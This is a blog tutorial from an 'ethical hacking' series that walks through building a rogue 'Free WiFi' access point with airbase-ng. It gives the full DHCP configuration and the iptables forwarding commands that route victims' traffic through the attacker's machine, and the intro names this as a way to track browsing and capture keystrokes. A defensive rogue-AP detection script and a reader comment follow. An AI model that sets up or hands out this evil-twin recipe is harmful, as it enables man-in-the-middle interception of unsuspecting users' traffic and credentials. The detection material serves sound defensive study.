Ethical Hacking with Kali Linux – Part 5: Rogue Wireless Access Points

April 7, 2016 | Views: 26268


Got free WiFi in the airport? At college? In motels? Or anywhere else? Before connecting, we must make sure the access points are really broadcast by the companies/offices/colleges themselves. Maybe the AP is fake (and not really associated with the airport/college/motel). Someone might have created a fake AP so they can track our browsing history and capture our keystrokes (for a MITM and a lot more). BEWARE!!! This is all about ROGUE Wireless Access Points.

 

Tools required:

apt-get: to get the new DHCP software

airmon-ng

airbase-ng: turns our Kali machine into an AP

dhcpd3: for adding DHCP server functionality

 

The fake AP process goes like this:

1) Someone connects to the fake AP that we created.
2) With DHCP, we provide a dynamically assigned IP address to them.
3) Similarly, we provide a default gateway and DNS.

 

Let’s begin….

Run:

apt-get update

apt-get upgrade

Let it finish, then run:

apt-get install dhcp3-server -y

(-y is simply yes for any prompts)

(Now, for safety, we move the default DHCP conf file to a backup, so that we can access it next time if needed.)

Run:

mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup

(in case of wrong location above, search in Google for the location)

We're now left with an empty conf file. We must define new settings here, such as the gateway and DNS, to hand out to any user who connects to this fake AP.

 

Let's assume we use the following settings on our logical interface:

Network : 192.168.2.0/24

DNS : 8.8.8.8

Gateway : 192.168.2.1

These will create our specified wireless routing network.

Let's assume our own network is at 192.168.1.0/24.

When a user connects to the fake AP and wants to surf the internet, the traffic first passes through the network specified above and then gets routed to its original destination via our network at 192.168.1.0/24.

 

Let's work in our text editor. You can choose your favorite one. I'll use nano:

Run:

nano /etc/dhcp3/dhcpd.conf

You'll get a blank dhcpd.conf in the text editor.

Now, write the following exactly:

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
    option subnet-mask 255.255.255.0;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.1;
    option domain-name-servers 8.8.8.8;
    range 192.168.2.51 192.168.2.100;
}

CTRL+X
Y
ENTER

Run:

airmon-ng start wlan0

airodump-ng mon0

 

Let's create a new ESSID "Free WiFi":

Run:

airbase-ng --essid "Free WiFi" -c 6 mon0

(The channel is 6, as seen after airodump-ng mon0, but it may differ in your case.)

Open a new tab, or clone the session. Run:

ifconfig at0 up

Next, let's assign the IP to at0. Run:

ifconfig at0 192.168.2.1/24

 

Let’s route the Kali machine with our assigned GW. Run:

route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

Start DHCP server service. Run:

dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0

/etc/init.d/dhcp3-server start

Run:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

 

Finally, wait and watch in the previous tab to see if someone’s associated with Free WiFi or not. Enjoy!

A quick note: This series is only for educational purposes. Practice this series in a lab, in a virtual/separate network, and always avoid illegal activities. If you can, then support us in fighting the bad guys.
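
Seen from the defender's side, the AP built above is an open network advertising a familiar ESSID from a BSSID the site does not own. The following added example (not part of the original post) checks a CSV capture written by airodump-ng's -w option against an inventory of legitimate APs; the inventory format, the function names and all sample MAC addresses are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag APs that advertise one of our ESSIDs but are not ours.

# usage: find_rogue_aps INVENTORY_FILE AIRODUMP_CSV
# Inventory lines (assumed format): ESSID|BSSID|expected Privacy value
find_rogue_aps() {
  awk -F',' '
    function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
    NR == FNR {                        # first file: the inventory
      split($0, f, "|")
      if (f[1] != "") { known[f[1]] = 1; enc[f[1] SUBSEP toupper(f[2])] = f[3] }
      next
    }
    /^Station MAC/ { exit }            # client section follows; APs only
    NF < 14 || /^BSSID/ { next }       # blank lines and the header row
    {
      bssid = toupper(trim($1)); priv = trim($6); essid = trim($14)
      if (!(essid in known)) next      # not one of our network names
      key = essid SUBSEP bssid
      if (!(key in enc))               # our name, somebody else radio
        printf "UNKNOWN_BSSID essid=\"%s\" bssid=%s channel=%s privacy=%s\n", essid, bssid, trim($4), priv
      else if (enc[key] != priv)       # our BSSID, wrong encryption: likely spoofed
        printf "PRIVACY_MISMATCH essid=\"%s\" bssid=%s expected=%s seen=%s\n", essid, bssid, enc[key], priv
    }
  ' "$1" "$2"
}

run_demo() {  # constructed inventory and capture, for illustration only
  local dir; dir=$(mktemp -d)
  printf '%s\n' 'Free WiFi|AA:BB:CC:00:00:01|WPA2' 'Free WiFi|AA:BB:CC:00:00:02|WPA2' > "$dir/inventory.txt"
  cat > "$dir/capture-01.csv" <<'EOF'

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:00:00:01, 2016-04-07 10:00:00, 2016-04-07 10:05:00,  1,  54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0,   9, Free WiFi,
AA:BB:CC:00:00:02, 2016-04-07 10:00:00, 2016-04-07 10:05:00, 11,  54, OPN, , , -35, 90, 0,   0.  0.  0.  0,   9, Free WiFi,
02:11:22:33:44:55, 2016-04-07 10:01:00, 2016-04-07 10:05:00,  6,  54, OPN, , , -30, 200, 0,   0.  0.  0.  0,   9, Free WiFi,
66:77:88:99:AA:BB, 2016-04-07 10:00:00, 2016-04-07 10:05:00,  3,  54, WPA2, CCMP, PSK, -70, 40, 0,   0.  0.  0.  0,   8, CafeNet2,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
10:20:30:40:50:60, 2016-04-07 10:02:00, 2016-04-07 10:05:00, -45, 30, 02:11:22:33:44:55, Free WiFi
EOF
  find_rogue_aps "$dir/inventory.txt" "$dir/capture-01.csv"
  rm -rf "$dir"
}

run_demo
```

The parser splits on commas, so an ESSID that itself contains a comma will be misread; BSSIDs can also be spoofed, which is why the encryption mismatch is checked separately.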


See the other posts in this series:

Ethical Hacking with Kali Linux – Part 1: Objective
Ethical Hacking with Kali Linux – Part 2: Finding Hidden SSIDS
Ethical Hacking with Kali Linux – Part 3: Bypassing Mac Address Filter
Ethical Hacking with Kali Linux – Part 4: Breaking WPA2 Wireless
Ethical Hacking with Kali Linux – Part 6: Nmap (Network Mapper)

By : Bijay Acharya 
Follow me : twitter.com/acharya_bijay

7 Comments
  1. This tutorial needs to be updated to facilitate Kali Rolling. The command apt-get install dhcp3-server -y is obsolete. Currently the package is not in the repository. Furthermore, apt-get is also obsolete. I believe it's best practice to be teaching correct methodology. Simply: apt install isc-dhcp-server
